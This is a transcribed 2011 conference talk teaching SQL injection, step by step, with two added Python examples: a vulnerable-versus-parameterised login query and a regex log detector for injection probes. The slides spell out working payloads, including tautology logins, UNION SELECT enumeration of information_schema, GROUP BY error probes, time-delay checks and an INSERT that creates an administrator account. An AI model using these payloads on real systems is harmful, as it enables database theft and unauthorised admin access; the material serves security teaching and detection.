
How Did I Steal Your Database (CSCamp2011)


  1. How Did I Steal Your Database
     Mostafa Siraj
     Application Security Expert
  2. DISCLAIMER
     Hacking websites is ILLEGAL
     This presentation is meant for educational purposes ONLY
     Only use this stuff on YOUR website and YOUR account
  3. Nearly all applications rely on a Datastore
  4. What is a Database
     A collection of tables (Users, Orders, Countries, etc.)
     The tables are a collection of columns/rows
  5. What is SQL
     A query language that allows interacting with the database
     SQL can:
     Retrieve data from the database
     Insert new records in the database
     Delete records from the database
     Update records in the database
  6. SQL Queries
     To get all data about username elprince:
     SELECT Username, Password, First_Name, Last_Name
     FROM Users
     WHERE Username='elprince'
     Gives a result:
  7. FACT
     Amongst Codd's rules for a relational database:
     Metadata must be stored in the database just as regular data is
  8. SQL Injection
     is a technique where an attacker creates or alters existing SQL commands to:
     Expose hidden data (e.g. steal all the records from the tables)
     Override the data (e.g. the administrator's password)
     Execute dangerous system-level commands on the database host
  9. SQL Injection Login Example
     SELECT * FROM Users WHERE Username='username' AND Password='password'
     If the user entered Elprince, Elprince123 the query will be
     SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'
  10. SQL Injection Example, Cont.
     Suppose the user entered ' OR 1=1--, 123; the query will be
     SELECT * FROM Users WHERE
     Username='' OR 1=1--' AND Password='123'
     -- comments out everything after it, so the query will be
     SELECT * FROM Users WHERE
     Username='' OR 1=1--
  11. This is not enough
     You can enhance the injection to log in with the administrator account
     Enter ' OR 1=1 ORDER BY 1--, abc; the query will be
     SELECT * FROM Users WHERE
     Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
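The login query of slides 9-11, built by string concatenation beside its parameterised form, as an added example that is not part of the original deck. It runs against an in-memory SQLite database with constructed sample users (the deck does not name the engine for this example), and shows that the same `' OR 1=1--` input matches every row in the concatenated version and nothing in the bound-parameter version.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table; column names follow the deck's Users table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT, IsAdmin INTEGER)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [("admin", "s3cret", 1), ("Elprince", "Elprince123", 0)],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # The pattern from slide 9: user input spliced into the statement text,
    # so a quote in the input ends the literal and -- comments out the rest.
    sql = ("SELECT Username FROM Users WHERE Username='" + username
           + "' AND Password='" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Bound parameters: the statement is fixed and the values travel
    # separately, so ' OR 1=1-- is compared as a literal username.
    sql = "SELECT Username FROM Users WHERE Username=? AND Password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "Elprince", "Elprince123"))  # ['Elprince']
    print(login_vulnerable(db, "' OR 1=1--", "123"))         # ['admin', 'Elprince']
    print(login_safe(db, "' OR 1=1--", "123"))               # []
```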
  12. Finding SQL Injection Bugs
     Submit a single quotation mark and observe the result
     Submit two single quotation marks and observe the result
  13. Finding SQL Injection Bugs
     For multi-stage processes, complete all the stages before observing the results
     For search fields try using the wildcard character %
  14. Finding SQL Injection Bugs
     For numeric data, if the original value was 2 try submitting
     1+1 or 3-1
     If successful try using SQL-specific keywords, e.g.
     67-ASCII('A')
     If single quotes are filtered try
     51-ASCII(1) [note ASCII(1)=49]
  15. Identify the database engine
     The error messages will let us know the DB engine
     We can guess the DB based on the OS or web server (e.g. LAMP: Linux+Apache+PHP+….)
  16. Identify the database engine
     Use specific characters or commands:
     String concatenation in different DB engines
     : '||'FOO
     : '+'FOO
     : ' 'FOO [note the space between the 2 quotes]
  17. Identify user privileges
     ' and 1 in (SELECT user) --
     '; IF user='admin' WAITFOR DELAY '0:0:10'--
  18. Injection in Search Fields
  19. Entering Normal Input
  20. Search Results
  21. Trying a Single Quote
  22. I receive this error
     Error states that it's
  23. Suppose I still don't know the DB engine. Is it
     Note: string concatenation in is +
  24. I'm getting an error, so it's not
  25. Is it
     Note: string concatenation in Oracle is ||
  26. Different error, still not
  27. Is it
     Note: string concatenation in MySQL is a blank space
  28. It's
  29. The query in the backend is something like this
     SELECT …,…,…,…,…
     FROM ….
     WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE….
     A possible location for my input
  30. The Strategy
     1. Get the number of items after the SELECT statement
     How many items are here?
     SELECT …,…,…,…,…
     FROM ….
     WHERE ….=…. AND ….!=….. OR …..>……
  31. The Strategy
     2. Identify the location of the STRINGS in the SELECT statement
     Which of those are strings?
     SELECT …,…,…,…,…
     FROM ….
     WHERE ….=…. AND ….!=….. OR …..>……
  32. The Strategy
     3. Get the structure of the database
     SELECT …,…,…,…,…
     FROM ….
     WHERE …. UNION
     SELECT ….,TableNames,….,….,…
     FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  33. The Strategy
     4. Get the data from the database
     SELECT …,…,…,…,…
     FROM ….
     WHERE …. UNION
     SELECT ….,Usernames,….,….,…
     FROM Users --=…. AND ….!=….. OR …..>……
  34. The Strategy
     1. Get the number of items after the SELECT statement
     2. Identify the location of the STRINGS in the SELECT statement
     3. Get the structure of the database
     4. Get the data from the database
  35. 1. Get the number of items after the SELECT statement
  36. Error
  37. Try another number
  38. Result
     Why are there fewer results?
  39. Try another number
  40. Error, it's not 8
  41. Let's try 7
  42. Result
     How many columns do we have in the SELECT statement?
  43. The Strategy
     1. Get the number of items after the SELECT statement
     2. Identify the location of the STRINGS in the SELECT statement
     3. Get the structure of the database
     4. Get the data from the database
  44. 2. Identify the location of the STRINGS in the SELECT statement
     1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  45. Result
  46. Get the strings and their locations
     1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  47. Result
  48. The Strategy
     1. Get the number of items after the SELECT statement
     2. Identify the location of the STRINGS in the SELECT statement
     3. Get the structure of the database
     4. Get the data from the database
  49. 3. Get the structure of the database
     1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#
  50. Result
  51. The Strategy
     1. Get the number of items after the SELECT statement
     2. Identify the location of the STRINGS in the SELECT statement
     3. Get the structure of the database
     4. Get the data from the database
  52. Next Queries
     1234')
     UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='USERS'#
     1234') UNION SELECT
     NULL,NULL,NULL,username,password,NULL,NULL
     FROM users
     WHERE id<100#
     …….
     Continue till you get all the tables
  53. The Strategy
     1. Get the number of items after the SELECT statement
     2. Identify the location of the STRINGS in the SELECT statement
     3. Get the structure of the database
     4. Get the data from the database
  54. Injection with errors
  55. Gives me an error
  56. Getting the version
     ' and 1 in (SELECT @@version)--
  57. Gives me this error
  58. Getting column names
  59. I get this error
  60. Getting the next column name
     ' group by login.firstname having 1=1--
  61. I get this error
  62. Again
     ' group by login.firstname, login.surname having 1=1--
  63. Error reveals a new column name
  64. Again
     ' group by login.firstname, login.surname, login.username having 1=1--
  65. New column name
  66. Continue…
  67. Continue…
  68. Continue…
     After getting all of the columns I found a field called IsAdmin (that's my goal)
     Submitting the following query creates an admin account on the application
     '; INSERT INTO Login
     (username,pwd,IsAdmin,……)
     VALUES
     ('Administrator','******',TRUE,…..)
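A log-side detector for the probe strings the deck walks through, as an added example that is not part of the original talk: the tautology of slide 10, the UNION SELECT NULL and information_schema queries of slides 44-52, and the GROUP BY ... HAVING 1=1 probes of slides 60-64. The rule names, regexes and access-log lines are constructed for illustration; the query string is URL-decoded before matching because the probes arrive percent-encoded.

```python
import re
from urllib.parse import unquote_plus

# Rule name -> case-insensitive regex applied to the URL-decoded query string.
# Patterns follow the probes shown in the deck; they are illustrative, not a
# complete signature set. A lone single quote is deliberately not a rule: it
# fires on ordinary input such as O'Brien and would drown the real signal.
RULES = [
    ("tautology",        re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.I)),
    ("union-null-probe", re.compile(r"union\s+select\s+null(\s*,\s*null)*", re.I)),
    ("schema-read",      re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("groupby-having",   re.compile(r"group\s+by\s+[\w.,\s]+having\s+1\s*=\s*1", re.I)),
    ("version-probe",    re.compile(r"@@version|\(\s*select\s+user\s*\)", re.I)),
    ("time-delay",       re.compile(r"waitfor\s+delay", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')


def decoded_query(line: str) -> str:
    """Query string of the request in one access-log line, URL-decoded so that
    %27 becomes ' and + becomes a space before the rules see it. Only the URL
    is inspected: standard access logs do not record POST bodies."""
    m = REQUEST.search(line)
    if not m or "?" not in m.group("path"):
        return ""
    return unquote_plus(m.group("path").split("?", 1)[1])


def classify(line: str) -> list:
    """Names of the rules this log line matches, in RULES order."""
    query = decoded_query(line)
    return [name for name, rx in RULES if rx.search(query)]


def scan(lines) -> list:
    """(line number, matched rule names) for every line that matches a rule."""
    out = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            out.append((n, hits))
    return out


# Constructed sample lines in Apache combined-log style; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2011:10:00:01 +0200] "GET /search?q=laptop HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2011:10:00:04 +0200] "GET /search?q=rock%27n%27roll HTTP/1.1" 200 40',
    '10.0.0.9 - - [01/Jan/2011:10:00:07 +0200] "GET /search?q=1234%27)+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 498',
    '10.0.0.9 - - [01/Jan/2011:10:00:12 +0200] "GET /search?q=1234%27)+UNION+SELECT+NULL,NULL,NULL,table_name,NULL,NULL,NULL+FROM+information_schema.tables%23 HTTP/1.1" 200 2210',
    '10.0.0.9 - - [01/Jan/2011:10:01:30 +0200] "POST /login?user=%27+OR+1%3D1--&pwd=123 HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2011:10:02:02 +0200] "GET /items?id=%27+group+by+login.firstname,+login.surname+having+1%3D1-- HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```

Lines 3 and 4 of the sample, the column-count probe followed by the information_schema read from one source address within seconds, are the sequence the strategy slides describe and the pattern worth correlating on.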
  69. Not all injections generate errors
  70. DEMO: SQLMap
  71. You Were a GREAT Audience
  72. Thank You
     @mostafasiraj
     Mostafa Siraj
